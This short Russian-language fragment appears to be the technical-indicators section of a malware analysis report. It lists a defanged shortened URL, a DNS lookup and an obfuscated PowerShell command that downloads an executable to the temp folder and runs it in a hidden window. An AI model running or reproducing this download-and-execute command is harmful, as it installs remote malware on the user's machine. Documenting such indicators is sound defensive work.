Техническая информация
- http://bi#.ly/2oofnx2 как %temp%\987654.exe
- DNS ASK bi#.ly
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (NEw-objEct system.net.wEBclIenT).DownLoAdfIlE( ”http://bi#.ly/2oOFnx2 ” , ”$ENv:teMp\987654.exe” ) ; stARt ”$ENv:tEMP\987654.exe”' (со скрытым окном)